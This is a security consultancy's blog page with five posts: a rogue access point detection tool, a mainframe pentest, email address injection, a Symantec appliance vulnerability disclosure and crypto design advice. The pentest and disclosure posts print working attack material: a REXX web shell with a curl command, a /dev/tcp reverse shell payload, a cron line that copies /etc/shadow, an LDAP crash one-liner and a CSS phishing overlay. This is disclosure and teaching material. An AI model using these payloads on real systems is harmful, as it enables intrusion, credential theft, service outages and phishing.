Friday
Aug 26, 2016

Slaying Rogue Access Points with Python and Cheap Hardware

The Need for Open Source Rogue AP Protection

With the exception of cellular attacks that make use of SDR, rogue access point attacks are the most effective wireless attacks in practice today. Despite the fact that karma attacks have existed for nearly a decade, many devices still probe actively for their preferred networks, rendering them vulnerable to this form of exploitation [1]. Evil Twin attacks remain an issue for enterprise and smaller scale commercial networks alike.

Although effective solutions for detecting and responding to rogue access point attacks exist, they typically fall into a price bracket that is accessible only to enterprise customers [2][3][4]. This means that smaller scale commercial and retail networks, or even public sector networks operating with limited resources, are unlikely to be able to include rogue access point detection as part of their budgets. This lack of low-budget rogue AP protection has a severe impact on the security of the wireless landscape as a whole. Although attackers can and do use rogue access point attacks against enterprise networks, this is usually done with the intent of gaining credentials to pivot further into the target’s infrastructure. On the other hand, attackers who are focused on harvesting sensitive information such as credit card numbers are unlikely to target heavily secured and regularly audited enterprise networks. Instead, they are much more likely to employ evil twin attacks against softer targets such as local retailers and coffee shops, or make use of karma attacks in a crowded subway car or freeway. What this means is that the environments most likely to be targeted by a malicious actor are also the least protected.

In response to this problem, I developed an open source tool called sentrygun that can be run on inexpensive hardware in parallel with existing network setups. This blog post will cover the development of sentrygun, from the algorithms used to detect rogue APs to the design patterns that let network administrators leverage those algorithms. Finally, it will document the successes and challenges faced when deploying sentrygun to protect one of the most hostile network environments in the world: BSides Las Vegas.

Building a Rogue AP Protection Platform Pt 1 – Algorithm Development

The first task in creating sentrygun was to develop a set of reliable, effective, and easily implemented algorithms for detecting evil twin and karma attacks. A lot of prior work has already been done in this area, which gave me a pretty big head start. Unfortunately, most of the more advanced methods of detecting rogue access point attacks require direct coordination with the wireless networking hardware [5]. Most networking hardware is highly proprietary, making this kind of cooperation next to impossible.

This means that the algorithms used by sentrygun would have to operate in complete independence from the network being protected. Three algorithms were identified that met this requirement: evil twin detection using whitelisting, evil twin detection through statistical analysis of signal strength, and karma detection through analysis of probe request/response patterns.

Detecting evil twin attacks using whitelisting is a classic approach outlined in multiple sources, most notably in a 2006 SANS publication by Larry Pesce [6]. In this strategy, a whitelist is created containing the ESSID and BSSID of every wireless access point on the network being protected. A packet sniffer then captures probe response packets from nearby access points. If a probe response is captured that has an ESSID from the whitelist, but a BSSID not in the whitelist, it follows that there is an evil twin attack occurring nearby.

whitelist based algorithm for detecting evil twins
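In Python, the core of this check fits in a few lines. The sketch below uses hypothetical names and a hard-coded whitelist; sentrygun itself feeds the check from a live packet sniffer rather than a static dictionary.

```python
# Minimal sketch of the whitelist check (hypothetical names and data).
# The whitelist maps each protected ESSID to its legitimate BSSIDs.
WHITELIST = {
    "CorpNet": {"aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02"},
}

def is_evil_twin(essid, bssid):
    """Flag a probe response that advertises a whitelisted ESSID
    from a BSSID that is not in the whitelist."""
    known = WHITELIST.get(essid)
    if known is None:
        return False  # not a network we protect
    return bssid.lower() not in known

assert is_evil_twin("CorpNet", "de:ad:be:ef:00:01")       # evil twin
assert not is_evil_twin("CorpNet", "aa:bb:cc:dd:ee:01")   # legitimate AP
assert not is_evil_twin("GuestNet", "de:ad:be:ef:00:01")  # not our network
```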

The problem with this approach is that it does not account for scenarios in which the attacker sets the BSSID of the rogue access point to a BSSID used by a legitimate access point on the network. One way of addressing this issue is by adopting a different strategy entirely: attempt to identify evil twin attacks by paying attention to signal strength. Suppose we were to place a packet sniffer a fixed distance away from a legitimate access point on our network. Wireless access points are typically stationary objects, so the signal strength from the access point to the packet sniffer should not change drastically over a short period of time. Now suppose an attacker spawned an evil twin access point somewhere nearby. Packets sniffed from the evil twin should have noticeably different TX values than packets sniffed from the legitimate access point.

This means that we can augment our previous approach by establishing a baseline TX range for packets sent from each BSSID in the whitelist. Any packets received that appear to come from an access point in the whitelist, but that have a TX value that falls outside of the baseline range for that access point, are deemed to have been sent by an evil twin. This combined approach of whitelisting and signal strength analysis provides a more effective solution to evil twin detection.


whitelist algorithm augmented with signal strength analysis
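A minimal sketch of the baseline logic, assuming a simple mean-and-standard-deviation model (sentrygun's actual statistical handling may differ; all names and readings here are illustrative):

```python
from statistics import mean, stdev

def build_baseline(samples, k=3):
    """Turn TX readings gathered during a calibration period into an
    acceptable window of k standard deviations around the mean."""
    mu, sigma = mean(samples), stdev(samples)
    return (mu - k * sigma, mu + k * sigma)

def outside_baseline(tx, baseline):
    low, high = baseline
    return tx < low or tx > high

# Readings (in dBm) sniffed from a legitimate, stationary AP.
calibration = [-42, -44, -41, -43, -42, -44, -43]
baseline = build_baseline(calibration)

assert not outside_baseline(-43, baseline)  # consistent with the real AP
assert outside_baseline(-75, baseline)      # likely an evil twin elsewhere
```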

Spotting karma attacks turns out to be much simpler. Karma attacks work by configuring a rogue access point to respond to all probe requests it receives [7]. If the rogue access point receives a legitimate probe request for the ESSID “ms08067”, it will respond with a probe response for ESSID “ms08067”. Similarly, if it receives a probe request for the ESSID “\x90\x90\x90”, it will reply with a probe response for ESSID “\x90\x90\x90”. The rogue access point will send all of these responses using the same BSSID [1]. Since the targeted wireless clients need a consistent BSSID in order to remain connected to the rogue access point, cycling BSSIDs between probe responses is not an option.


algorithm to detect karma attacks

This means that karma attacks can always be identified by the one-to-many relationship that they create between a single BSSID that maps to multiple ESSIDs. Karma attacks can be detected by flagging any BSSID that sends probe responses for multiple ESSIDs. This algorithm can be further improved by periodically crafting and broadcasting probe requests for random ESSIDs using a parallel process. Doing so allows the algorithm to detect karma attacks even when no wireless clients are actively probing nearby.
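The detection logic reduces to tracking that one-to-many mapping. A sketch, with hypothetical names:

```python
from collections import defaultdict

# ESSIDs each BSSID has answered probe requests for.
responses_seen = defaultdict(set)

def observe_probe_response(bssid, essid):
    """Record a probe response; return True once a single BSSID has
    answered for more than one ESSID (the karma signature)."""
    responses_seen[bssid].add(essid)
    return len(responses_seen[bssid]) > 1

assert not observe_probe_response("de:ad:be:ef:00:01", "ms08067")
# The same BSSID answering a probe for an unrelated ESSID gives it away.
assert observe_probe_response("de:ad:be:ef:00:01", "\x90\x90\x90")
```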

Sentrygun uses all three of the algorithms described to detect evil twin and karma attacks. Additional methods for detecting evil twin and karma attacks are currently being implemented, along with improvements to the algorithms already in use.

Building a Rogue AP Protection Platform Pt 2 – System Development

Using the algorithms described in the previous section to build a functional wireless IDS poses its own set of challenges. Such a system would have to be capable of protecting a wireless network of arbitrary size, and would have to scale with future expansions of the network. It would also have to give network operators a means of tracking and managing attacks across the entire network from a centralized location. The system would have to require minimal setup and fine-tuning in order to work. Most importantly, the system would have to meet these requirements while still providing a reliable means of identifying, locating, and responding to wireless attacks.

Figure 1

To meet these requirements, sentrygun was developed as an array of sensors arranged in a grid connected to a centralized command and control server through ssh tunnels (figure 1). All sensor and server systems are security hardened Linux installations. Each sensor runs a packet sniffing Python script that analyzes wireless traffic using the algorithms described in the previous section. When a sensor detects a rogue access point attack, an alert is pushed to the C&C server. The C&C server stores the alert details in a time based cache, then broadcasts the alert to one or more web clients. Each web client displays a list of all alerts that have recently been sent by the sensors.

Figure 2

As shown in figure 2, alerts can be expanded to show a list of all devices currently detecting the wireless attack. Network administrators can respond by launching a flooding or deauth attack that is carried out by all sensor devices simultaneously. Additionally, network administrators can attempt to locate the rogue access point by sending security personnel to the sensor detecting the highest TX power from the attack. Sensor devices are sorted by TX and can be labeled to facilitate this functionality, as shown in figure 2. Finally, network administrators can choose to dismiss the alert. Doing so causes the C&C server to remove the alert from the time based cache and broadcast a message to all web and sensor clients. This message causes all web clients to remove the alert from the list, and causes all sensors to terminate any existing deauth or flooding attacks against the rogue access point.
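The server's time-based cache can be sketched as follows. The class and alert identifiers are hypothetical and the real implementation stores richer alert details, but the expiry-unless-refreshed behaviour is the essential part:

```python
import time

class AlertCache:
    """Time-based cache: an alert stays active only while sensors
    keep refreshing it within the TTL window."""

    def __init__(self, ttl_seconds):
        self.ttl = ttl_seconds
        self._alerts = {}  # alert id -> last-seen timestamp

    def push(self, alert_id):
        self._alerts[alert_id] = time.monotonic()

    def dismiss(self, alert_id):
        self._alerts.pop(alert_id, None)

    def active(self):
        now = time.monotonic()
        return [a for a, t in self._alerts.items() if now - t < self.ttl]

cache = AlertCache(ttl_seconds=0.05)
cache.push("evil-twin:CorpNet")
assert cache.active() == ["evil-twin:CorpNet"]
time.sleep(0.1)
assert cache.active() == []  # expired: no sensor refreshed the alert
```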

This architecture provides sentrygun with the means to detect, respond to, and locate rogue access point attacks in real-time. Additionally, since the most resource intensive work is done on the C&C server, the sensor units can be built using inexpensive platforms such as the Raspberry Pi. Finally, the web interface provides an intuitive cross platform interface for controlling sentrygun and analyzing wireless attack data.

Field Test: BSides Las Vegas

Ensuring that sentrygun was able to function effectively outside of the lab environment could only be accomplished through intense field testing. Fortunately, the BSides Las Vegas NOC team generously provided me with a live environment in which to conduct such a test. Simply put: they put me in charge of wireless security for the conference. This meant that I was tasked with ensuring the integrity of attendees’ data during a week in which Vegas is home to some of the most notoriously hostile networks in the world. It seemed like an excellent opportunity to test sentrygun.

I arrived in Las Vegas on Saturday afternoon, July 30th, three days before the start of the BSides conference. After meeting up with the rest of the BSides staff, we spent the evening unpacking boxes and making an emergency run to the local electronics depot to purchase supplies for the network. The NOC team was scheduled to build the conference network on Monday, which gave me all of Sunday to assemble and test each of the sensor units used in the sentrygun implementation. Due to the number of sensors needed to cover the conference floorspace, doing this in such a short timeframe seemed daunting.

Tuscany Suites Sweatshop. BSides Goons from left to right: Chester Bishop, Ben, and Justin Whitehead                 

These look totally harmless

Fortunately, a few of the awesome folks on the BSides security team came to the rescue to help me set up the sensors. We converted a hotel room into an electronics workshop, sat down with a couple of cases of Red Bull, and finished building the sentrygun sensor units within a few hours.

At the BSides NOC, we take cable management seriously

On Monday morning I joined the NOC team in setting up the BSides network itself. This involved running a few thousand feet of Cat5 cable, as well as configuring three wireless networks across multiple channels. Once the network was set up, the sentrygun sensors were laid out in a grid across the conference floor using copious amounts of gaff tape and Velcro.


Don’t mind the things on the walls….


On Tuesday morning, the conference opened its doors and the network was put to use. Within half an hour, a panicked attendee had already summoned security after purportedly finding a rogue access point taped to the wall. The “rogue access point” turned out to be one of our sentrygun sensor units, much to the amusement of the BSides staff. We had no similar incidents throughout the rest of the day.

No wireless threats were detected until the early evening, at which point the 802.11 spectrum seemed to come alive with hostility. At around 5pm, sentrygun detected a karma attack emanating from one of the far corners of the main conference space. Security was dispatched to investigate, and after noticeably increasing the physical security presence in the area the attack stopped. By the end of the conference on Tuesday night, several similar attacks were identified and dealt with accordingly.

The field test demonstrated that sentrygun is capable of identifying wireless threats in a live network environment. It also led to several important findings that will prove critical in sentrygun’s transition from a proof of concept to a mature wireless defense platform. One such finding is that within the context of a crowded conference venue, narrowing the location of a rogue access point down to a few meters is not always enough. There were multiple incidents in which an evil twin or Karma attack was detected and localized to an area containing at least two dozen people with backpacks or laptops. In these circumstances, noticeably increasing security presence was usually enough to stop the attack. However, the ability to consistently identify the exact source or perpetrator of the attack would be preferable.

Closing Thoughts

Overall, the sentrygun project has been a success. It has demonstrated that it is possible to provide rogue access point detection using relatively simple algorithms and inexpensive equipment. It has demonstrated that such a system can be designed and built over the course of a few weeks. It has also led to the development or verification of three algorithms used for detecting evil twin and karma attacks. Most importantly, it has opened the doors for future research in rogue AP identification and mitigation.

There are aspects of sentrygun’s design that require further development. While sentrygun’s algorithm for detecting evil twins based on variance in TX values makes for an effective proof of concept, stronger statistical models that account for externalities such as environmental interference would be preferable. Similarly, it would be interesting to investigate the use of machine learning to distinguish between rogue and legitimate access points. Finally, a more effective technique for locating rogue access points is needed if the system is to be equally effective in highly populated environments.

Sentrygun is an open source project. If you’d like to contribute, particularly in the areas previously mentioned, please contact [email protected] or make a pull request to the appropriate Github repo from the list below: 

Additionally, be sure to check out my DEFCON talk on rogue access point detection. The PowerPoint slides can be found here, and video footage should be on YouTube within the next few weeks.

References

[1] https://www.sensepost.com/blog/2015/improvements-in-rogue-ap-attacks-mana-1-2/
[2] http://ciscoprice.com/gpl/AIR%200
[3] http://www.arubanetworks.com/assets/wsca/WSCA_PriceList.xls
[4] https://www.amazon.com/Fluke-Networks-AM-A1150-AirMagnet/dp/B002YHJMMY?ie=UTF8&*Version*=1&*entries*=0
[5] http://www.cisco.com/c/en/us/support/docs/wireless/4400-series-wireless-lan-controllers/112045-handling-rogue-cuwn-00.html
[6] https://www.giac.org/paper/gawn/7/discovering-rogue-wireless-access-points-kismet-disposable-hardware/107273
[7] https://www.trailofbits.com/resources/attacking_automatic_network_selection_paper.pdf
[8] http://www.arubanetworks.com/assets/ds/AB_AW_RAPIDS.pdf
[9] http://www.cisco.com/c/en/us/products/wireless/buyers-guide.html
[10] http://www.arubanetworks.com/techdocs/InstantMobile/Advanced/Content/Instant%20User%20Guide%20-%20volumes/Rogue_AP_Detection_and_C.htm
[11] http://www.arubanetworks.com/techdocs/ArubaOS_63_Web_Help/Content/ArubaFrameStyles/New_WIP/Rogue_AP_Detection.htm
[12] http://www.arubanetworks.com/assets/contract/March2015_PriceList.xls

Wednesday
Jun 22, 2016

REXX CGI Web Shell

Recently I was conducting a mainframe assessment (z/OS), and the application account I had access to was able to FTP directly to the system. There were also multiple web servers listening on the host, so I used web shell planting tactics to gain remote command execution — albeit with an uncommon scripting language (REXX).

Typically when you FTP to an IBM mainframe you will find yourself in the Multiple Virtual Storage (MVS) file system. This is indicated by “Remote system type is MVS” in the FTP response message.

It’s possible to change to a Unix-like file system, Hierarchical File System (HFS), to make it easier to understand (at least for me!). This can be accomplished by executing a simple change directory command using FTP.

Change to HFS
ftp> cd /
250 HFS directory / is the current working directory

After identifying this access, I trawled through the more familiar file system and came across a CGI web root that permitted the execution of REXX scripts. REXX is an interpreted scripting language developed by IBM that dates back to the beginning of the 80s.

After creating a simple REXX web shell, I was able to upload the shell to the web root and chmod it with the appropriate permissions.

REXX Web Shell
/* rexx */
/* Emit the HTTP response headers */
'cgiutils -status 200 -ct text/x-ssi-html'
/* Read the parsed CGI form data back through a pipe */
address syscall 'pipe p.'
'cgiparse -f > /dev/fd' || p.2
address syscall 'close' p.2
address mvs 'execio 1 diskr' p.1 '(stem s.'
interpret s.1

/* Walk the form fields and extract the "cmd" parameter */
do i=1 to 100 until s.1=''
   parse var s.1 parm.i.1 '=' parm.i.2 '&' s.1
   if parm.i.1 = 'FORM_cmd' then do
      cmd = parm.i.2
      cmd = STRIP(cmd, ,"'")
   end
end

say 'Running as ' || USERID()
say 'Executing the following command... "' || cmd || '"'
/* Run the command, capturing its output through a second pipe */
address syscall 'pipe p.'
cmd || ' >/dev/fd'||p.2
address syscall 'close' p.2
address mvs 'execio * diskr' p.1 '(stem s.'
do i=1 to s.0
   say s.i
end
return

Finally, by sending a command to be executed in the cmd HTTP request parameter, I was able to gain command execution on the system as the WWWPUB user. Although FTP access was available, interactive command execution makes it much easier to enumerate and attack the system, and in this case it also provided a different set of access permissions.

The script can be executed like so:
$ curl http://host/cgi/foo/cmd.rexx --data-urlencode 'cmd=id'

Here we can see an example of the ps -ef command being executed by the WWWPUB user in the CGI directory.

Monday
Jun 13, 2016

Email Injection

On a recent project, we noticed that an application was accepting email addresses in an unsafe format. In the case of this application, it was echoing the email address, unescaped, into an email sent to the user’s account.

It’s not that the application wasn’t validating email addresses. It was, in fact, running all email addresses through the standard Java validator, javax.mail.internet.InternetAddress.validate().

However, legal email addresses can have some amazingly complex things in them.

The Wikipedia page for email addresses has examples of legitimate, if crazy, email addresses.

The Java library mostly (but not completely) agrees with the email addresses as indicated in that article.

Now, to put dangerous content into email addresses, there are two general methods useful for attackers: comments and quoted portions. The Java library does not accept comments in email addresses, but it does accept quoted portions.

This is an example of a legal email using quoting:

 "john.smith"@example.org

as is

 "john.smith<script>alert(1);</script>"@example.org

Web pen testers will recognize the latter as the canonical test for an XSS attack.

In this case, the email address was being put into an outbound email. This normally is not an XSS vector. Email is typically read in a dedicated mail application, or in a webapp. Mail applications often don’t have JavaScript engines, and Webmail applications as a rule will refuse to render any JavaScript. (Sometimes attackers will find a way around this, but it’s very hard to do, and if they succeed it is a much bigger problem than any I describe here.)

Modern mail readers still have significant CSS capabilities, so the ability to insert arbitrary HTML into them means the ability to change the message visible to the user arbitrarily.  This can lead to very successful phishing attacks, since an attacker can cause malicious messages to originate from the legitimate and expected service.

My primary mail reader target was OSX’s Mail.app, with Thunderbird as a secondary.

The application we were looking at had a strong limit of 50 characters for an email address, and the domain had to have at least two labels, of which the second had to be at least 2 characters. (This is not part of the RFC, nor does the Java library require it.) Given the quotes and the domain, the longest message that could be inserted was 43 characters:

    "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"@x.xx

It was necessary, of course, to start a style tag, as well as to close it, so that left us with this much room:

    "<style>XXXXXXXXXXXXXXXXXXXXXXXXXXXX</style>"@x.xx

This still allowed room for a payload to be inserted thanks to URL shorteners and use of the @import directive.

    "<style>@import 'http://xxxxxxxxxxx'</style>"@x.xx

The “http://” is required in the mail context, as are the quotes.

Can a normal person fit a URL in 11 characters?  Domains like “ant.nu” are available, but there is no need to splurge on a short domain.  The best link shorteners can give you a URL in 9 characters, so this is our hostile email address, with two characters to spare:

    "<style>@import 'http://ly.my/pva'</style>"@x.xx
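The arithmetic checks out in a couple of lines of Python (the shortener URL is the one from the example above; "x.xx" stands in for any minimal two-label domain the validator accepts):

```python
# Reconstructing the length budget: a quoted local part carrying the
# <style> payload, plus "@" and the shortest accepted domain "x.xx",
# must fit the application's 50-character limit on email addresses.
payload = "<style>@import 'http://ly.my/pva'</style>"
address = '"' + payload + '"@x.xx'

assert len(address) == 48  # two characters to spare under the 50 limit
assert len(address) <= 50
```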

Now, with arbitrary space, we can put in an appropriate payload that overwrites the message:

body {
  visibility: hidden;
}
body:after {
  content:'We have detected unauthorized access to your account. Please visit http://example.account-recovery.net/ to restore access, or call 555-1212.';
  visibility: visible;
  display: block;
  position: absolute;
  padding: 5px;
  top: 2px;
}

And the message in Apple Mail.app looks like this:

In Thunderbird, if you accept the warning to load remote content, you get this:

LESSONS

  1. Email address validation is not the same as email address sanitization.
  2. More mail readers should be suspicious of external links, and offer an option like Thunderbird does to delay loading of external content.

Tuesday
Jun 7, 2016

Vulnerability Disclosure Info: Symantec Encryption Management Server

During a security assessment project in 2015, GDS encountered a fully patched Symantec Encryption Management Server appliance. This product provides secure messaging both between users of the organization and with external users. Each server is managed via an administrative web interface. During the project, and follow-on research, GDS discovered several issues that were reported to Symantec and have subsequently been addressed in later releases of the software. Now that Symantec customers, among them some of our clients, have had ample time to apply the relevant patches, we thought we’d share details of these vulnerabilities.

OS Command Execution

The administration web interface includes the facility to search the log files. When performing a search, it was possible, using a specially crafted search term, to execute OS level commands on the appliance. The search functionality dynamically built a command string, with untrusted user input, that was then executed by the operating system command shell. Insufficient validation of the supplied parameters exposed arbitrary command execution and provided an attacker with privileges or capabilities previously unavailable.

This issue required a user account with low privilege access to the administrative interface. The lowest privilege user role with this level of access is Reporter.

The following text, entered into the search box, was used to start an interactive, reverse TCP connection, shell.

|` /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1`

The resulting interactive shell is executed as user tomcat.

CVE-2015-8151 was assigned to cover the above issue.

Local Privilege Escalation

The tomcat user had write access to the file /etc/cron.daily/tomcat.cron. The contents of this file were executed in the context of the root super-user account. Consequently, given command execution (see above), arbitrary commands could be scheduled for execution as root.

ls -al /etc/cron.daily/tomcat.cron

-rwxrwxr-x 1 root tomcat 88 Jul  6 03:58 /etc/cron.daily/tomcat.cron

As the tomcat user, GDS were able to append additional content to the cron job. For example, with the command below:

$ echo 'cat /etc/shadow >/tmp/shadow' >> /etc/cron.daily/tomcat.cron

This cron job was executed daily and ran with root privileges.

ls -l /tmp/shadow

-rw-r--r-- 1 root root 825 Jul  6 04:02 /tmp/shadow

cat /tmp/shadow

root:!!:16612:0:99999:7:::
bin:*:16612:0:99999:7:::
daemon:*:16612:0:99999:7:::

CVE-2015-8150 was assigned to cover the above issue.

Heap Based Memory Corruption

GDS also discovered a repeatable crash in the LDAP service running on the appliance. This could be reproduced using the following simple python script.

python -c "import socket; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(('10.240.28.199', 636)); s.send('803a01030100030000002e00000040404141414142424242434343434444313145454545464646464747474731314848494949494a4a4a4a4b4b4b4b'.decode('hex'))"

This will trigger a SIGSEGV signal and the service will exit. LDAP and LDAPS will not be available until the service has been automatically restarted.

CVE-2015-8149 was assigned to cover the above issue.

Vendor Update

Symantec have released fixes for the issues described above in SEMS 3.3.2 MP12. For more information from the vendor see https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20160218_00

Friday
Jun 3, 2016

Insights from the Crypto Trenches

At GDS we are in the particularly advantageous position of working with a wide variety of products, spending time understanding their security and often uncovering their flaws. Given this experience, we decided to share some of our thoughts on the cryptographic aspects of building modern software.

It should come as no surprise to anyone in the field of security engineering that working with crypto is a perilous business, and even highly experienced engineers can get it wrong sometimes. Sophisticated attacks come along once in a while, partially breaking OpenSSL and other well-respected security libraries. However, for those who have spent enough time in the trenches of cryptographic security, it is clear that the vast majority of crypto issues don’t stem from an underlying vulnerability in a well-respected library. Instead, they overwhelmingly stem from incorrect designs and implementation-specific mistakes in the use of well-built crypto components. In this blog post we try to expand on why design and implementation go wrong and give advice on making things go better.

Modern, agile software development processes generally merge some of the stages of requirements analysis, architecture, design, implementation and testing. However, in the case of cryptography it is dangerous to conflate these distinct stages. Cryptography must be considered at all these stages, and because of its difficulty and importance for securing important data and decisions, it must be given higher priority than most other elements. As such, it is typical for a software house to discuss crypto-related decisions for longer, and entrust cryptographic aspects of the system to be implemented by one of the most senior engineers. Both of these help, as do checklists such as those implemented by testssl.sh [1] or guidance such as that provided on Martin Fowler’s blog [2].

However, no checklists or easy guides exist for hand-rolled cryptographic constructs. When it comes to designing systems that use cryptography to achieve an end goal, one of the fundamental mistakes made by designers is to reinvent the wheel in the crypto design space. This is not necessarily because anybody needs the burden of designing something new. Instead it’s because it is hard to know what class of problems can be solved with a certain cryptographic construct. It also doesn’t help that cryptographic terminology can be very confusing. For example, Pseudo Random Functions (PRFs) are always implemented as a deterministic function that neither uses, nor exhibits, any random behaviour [3]. For this reason, GDS recommends bringing in experts, either internal or external, to early crypto design discussions. An expert can not only help mitigate the risk of misusing cryptography, but may also offer ways of reusing existing crypto constructs, reducing the overall cost and time budget of the project.

When it comes to writing code, those who are entrusted to implement the agreed-upon design often find themselves in a tight spot. They have to battle with two separate issues: what crypto library to use for a particular crypto construct and in what way should it be used.

At GDS, we advise our clients to use very few, battle-hardened crypto libraries with strongly restricted configuration sets to meet a large set of generic requirements. Unfortunately, cryptographic agility [4], as implemented by OpenSSL, is often at odds with restricted configurations and hardening. Although OpenSSL is the default go-to crypto library of choice, politics such as government-mandated cryptographic primitives (CAMELLIA from Japan, ARIA from South Korea, GOST from Russia, etc.) and misguided optimizations (such as 27,000 lines of Perl generating assembly in OpenSSL) also make it the elephant in the room that no one really wants to question. However, there is very little else to opt for. The obvious other choice is libnacl [5], written by a team led by Dan Bernstein, which tries to significantly limit the number of implemented crypto constructs and hence configurations, reducing the cognitive load and simplifying the job of the person charged with implementation. Although libnacl is a great library, its restricted functionality is often an issue; still, it excels at what it does implement. This is true for other specialized libraries as well, such as scrypt [6], which can be used for storing salted and hashed passwords or to derive keys from passwords. The library libsodium [7] builds on libnacl, attempting to address some of its portability and usability concerns. However, it is relatively new and mostly written by a single developer without the crypto pedigree of the nacl team. We therefore caution against using it in production environments. Working with cryptography in code is not easy either, which leads us to our next topic.

The second biggest headache that developers face at the implementation stage is the actual code around the use of the chosen crypto library and its constructs. It is not unheard of to see developers surprised that their sensitive memory-cleaning code has been optimised away by smart compilers [8]. As such, GDS recommends using high quality standards around crypto code. In all instances, the actual standards enforced are a function of language, developer familiarity, and a number of business factors such as coding culture; however, [9] and [10] are good starting points for C/C++. For example, when coding in C11, using the secure versions of functions that typically end with “_s” is good practice. The C11 standard requires that memset_s never be optimised away. Given the number of pitfalls such as these, internal code reviews and a final, third-party code review by an expert are important and highly recommended. Whether the third party is internal or external to the organisation, an expert will pick up problems that those less well versed in the use of crypto may not.

Finally, before software is shipped to customers, an overall, system level review of all elements of the cryptographic system is in order. As the above examples show, it is not easy to get crypto right even if the bits and pieces fit well together. Unfortunately, holistic security of a product depends on intricate interactions of the cryptographic subsystem with the rest of the application, its users, the cultural and social environments it will get deployed in, and the business’ goals. The points where these meet are an ample source of confusion and error. As such, a final review is always recommended.

At GDS, we get to see a lot of crypto code, often only at the final stages of development or beyond, when it’s already in active use by end users. Fixing issues at this stage is costly to the business and frustrating to the developers. Sometimes, when looking at the issues, one wonders how much time could have been saved by using the correct crypto constructs from the right libraries, with good coding guidelines from the get-go: no wasteful reinvention of the wheel and no costly retrofitting needed. When it comes to crypto, experience is key. Above, we have tried to put into writing some of the key recommendations that experienced crypto engineers give to solve real-world problems. Naturally, we have plenty more, but we always try to tailor them to the needs of the application at hand. In a series of blog posts to follow we plan to go more in-depth into some of the crypto issues we highlighted above, and more.

[1] https://testssl.sh/
[2] http://martinfowler.com/articles/web-security-basics.html#HashAndSaltYourUsersPasswords
[3] https://crypto.stanford.edu/pbc/notes/crypto/prf.html
[4] https://www.imperialviolet.org/2016/05/16/agility.html
[5] https://nacl.cr.yp.to/install.html
[6] http://www.tarsnap.com/scrypt.html
[7] https://download.libsodium.org/doc/
[8] https://www.securecoding.cert.org/confluence/display/cplusplus/MSC06-CPP.+Be+aware+of+compiler+optimization+when+dealing+with+sensitive+data
[9] http://www.cert.org/secure-coding/publications/books/secure-coding-c-c-second-edition.cfm
[10] https://www.securecoding.cert.org/confluence/display/seccode/SEI+CERT+Coding+Standards